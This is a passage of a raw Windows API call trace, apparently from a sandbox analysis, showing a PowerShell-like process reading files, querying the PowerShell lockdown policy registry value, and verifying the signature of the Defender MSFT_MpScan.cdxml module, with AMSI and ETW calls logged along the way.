lpOldMode=0x1b83ccb8) returned 1 [0275.622] GetFileType (hFile=0x3b8) returned 0x1 [0275.623] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0275.623] ReadFile (in: hFile=0x3b8, lpBuffer=0x29e19a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x29e19a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0275.630] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0275.631] ReadFile (in: hFile=0x3b8, lpBuffer=0x29e19a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x29e19a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0275.631] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0275.631] ReadFile (in: hFile=0x3b8, lpBuffer=0x29e19a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x29e19a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0275.631] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0275.631] ReadFile (in: hFile=0x3b8, lpBuffer=0x29e19a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x29e19a0*, lpNumberOfBytesRead=0x1b83cd58*=0x966, lpOverlapped=0x0) returned 1 [0275.632] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3966 [0275.632] ReadFile (in: hFile=0x3b8, lpBuffer=0x29e0e56, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x29e0e56*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0275.632] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3966 [0275.632] ReadFile (in: hFile=0x3b8, lpBuffer=0x29e19a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x29e19a0*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0275.633] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1630 [0275.633] GetSystemDirectoryW (in: lpBuffer=0x1acf1630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0275.634] CoTaskMemFree (pv=0x1acf1630) [0275.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0275.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0275.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0275.634] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0275.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0275.634] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0275.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x5e0) returned 0x0 [0275.635] RegQueryValueExW (in: hKey=0x5e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0275.635] RegCloseKey (hKey=0x5e0) returned 0x0 [0275.635] CloseHandle (hObject=0x3b8) returned 1 [0276.057] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0x151202af, Data2=0xe75b, Data3=0x4627, Data4=([0]=0x94, [1]=0x9f, [2]=0xb3, [3]=0xad, [4]=0xba, [5]=0xbb, [6]=0xd9, [7]=0x13))) returned 0x0 [0276.062] AmsiScanBuffer () returned 0x80070015 [0276.069] EtwEventWriteTransfer () returned 0x0 [0276.071] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.072] EtwEventActivityIdControl () returned 0x0 [0276.072] EtwEventActivityIdControl () returned 0x0 [0276.072] EtwEventActivityIdControl () returned 0x0 [0276.072] EtwEventActivityIdControl () returned 0x0 [0276.072] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.073] EtwEventActivityIdControl () returned 0x0 [0276.073] EtwEventActivityIdControl () returned 0x0 [0276.073] EtwEventActivityIdControl () returned 0x0 [0276.074] EtwEventActivityIdControl () returned 0x0 [0276.074] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x86a6c25, Data2=0xd470, Data3=0x4dcf, Data4=([0]=0x97, [1]=0x3b, [2]=0xca, [3]=0xa3, [4]=0x84, [5]=0xa4, [6]=0x90, [7]=0x40))) returned 0x0 [0276.074] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x287ec025, Data2=0x4f16, Data3=0x43ca, Data4=([0]=0x82, [1]=0xf6, [2]=0x7a, [3]=0xf6, [4]=0x10, [5]=0xd8, [6]=0xab, [7]=0x3a))) returned 0x0 [0276.074] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.075] EtwEventActivityIdControl () returned 0x0 [0276.075] EtwEventActivityIdControl () returned 0x0 [0276.075] EtwEventActivityIdControl () returned 0x0 [0276.076] EtwEventActivityIdControl () returned 0x0 [0276.076] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml")) returned 0x20 [0276.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0276.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0276.178] CoTaskMemAlloc (cb=0x20c) returned 0x1aceeff0 [0276.178] GetSystemDirectoryW (in: lpBuffer=0x1aceeff0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.179] CoTaskMemFree (pv=0x1aceeff0) [0276.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0276.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0276.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0276.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0276.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0276.179] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0276.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x3b8) returned 0x0 [0276.180] RegQueryValueExW (in: hKey=0x3b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0276.180] RegCloseKey (hKey=0x3b8) returned 0x0 [0276.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0276.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0276.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0276.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2a66a18 | out: lpFileInformation=0x2a66a18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6)) returned 1 [0276.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0276.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0276.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0276.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0276.181] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6)) returned 1 [0276.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0276.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0276.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0276.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0276.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0276.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0276.181] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6)) returned 1 [0276.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0276.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0276.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0276.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0276.182] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0276.182] GetFileType (hFile=0x3b8) returned 0x1 [0276.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0276.182] GetFileType (hFile=0x3b8) returned 0x1 [0276.182] WTGetSignatureInfo () returned 0x0 [0276.273] CertDuplicateCertificateContext (pCertContext=0x1ad08b20) returned 0x1ad08b20 [0276.273] CryptCATHandleFromStore () returned 0x81ee00 [0276.273] WTHelperGetProvSignerFromChain () returned 0x81b290 [0276.273] WTHelperGetProvCertFromChain () returned 0x1aa11030 [0276.274] CertDuplicateCertificateContext (pCertContext=0x1ad08da0) returned 0x1ad08da0 [0276.274] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x5dc) returned 0x0 [0276.274] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0276.275] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x2a67268, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0276.275] RegCloseKey (hKey=0x5dc) returned 0x0 [0276.275] CoTaskMemAlloc (cb=0x10) returned 0x1ace8090 [0276.275] CoTaskMemAlloc (cb=0x50) returned 0x1acc7750 [0276.275] WinVerifyTrust () returned 0x0 [0276.276] CoTaskMemFree (pv=0x1acc7750) [0276.276] CoTaskMemFree (pv=0x1ace8090) [0276.276] CertFreeCertificateContext (pCertContext=0x1ad08b20) returned 1 [0276.276] CloseHandle (hObject=0x3b8) returned 1 [0276.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0276.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0276.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0276.277] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0276.277] GetFileType (hFile=0x3b8) returned 0x1 [0276.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83ccb8) returned 1 [0276.277] GetFileType (hFile=0x3b8) returned 0x1 [0276.278] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0276.278] ReadFile (in: hFile=0x3b8, lpBuffer=0x2a683a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2a683a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.279] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0276.279] ReadFile (in: hFile=0x3b8, lpBuffer=0x2a683a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2a683a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.279] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0276.280] ReadFile (in: hFile=0x3b8, lpBuffer=0x2a683a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2a683a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.280] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0276.280] ReadFile (in: hFile=0x3b8, lpBuffer=0x2a683a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2a683a0*, lpNumberOfBytesRead=0x1b83cd58*=0xce6, lpOverlapped=0x0) returned 1 [0276.280] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3ce6 [0276.280] ReadFile (in: hFile=0x3b8, lpBuffer=0x2a677d6, nNumberOfBytesToRead=0x31a, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2a677d6*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0276.281] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3ce6 [0276.281] ReadFile (in: hFile=0x3b8, lpBuffer=0x2a683a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2a683a0*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0276.282] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1630 [0276.282] GetSystemDirectoryW (in: lpBuffer=0x1acf1630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.282] CoTaskMemFree (pv=0x1acf1630) [0276.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0276.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0276.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0276.283] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0276.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0276.283] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0276.283] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x5e0) returned 0x0 [0276.283] RegQueryValueExW (in: hKey=0x5e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0276.284] RegCloseKey (hKey=0x5e0) returned 0x0 [0276.284] CloseHandle (hObject=0x3b8) returned 1 [0276.288] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0276.288] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0276.289] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0276.289] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0276.289] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0276.289] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0276.555] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0x22e2edc8, Data2=0x6b40, Data3=0x44a0, Data4=([0]=0xab, [1]=0x47, [2]=0x79, [3]=0x24, [4]=0x46, [5]=0xee, [6]=0xf5, [7]=0x3a))) returned 0x0 [0276.559] AmsiScanBuffer () returned 0x80070015 [0276.567] EtwEventWriteTransfer () returned 0x0 [0276.567] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.568] EtwEventActivityIdControl () returned 0x0 [0276.568] EtwEventActivityIdControl () returned 0x0 [0276.568] EtwEventActivityIdControl () returned 0x0 [0276.568] EtwEventActivityIdControl () returned 0x0 [0276.568] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", 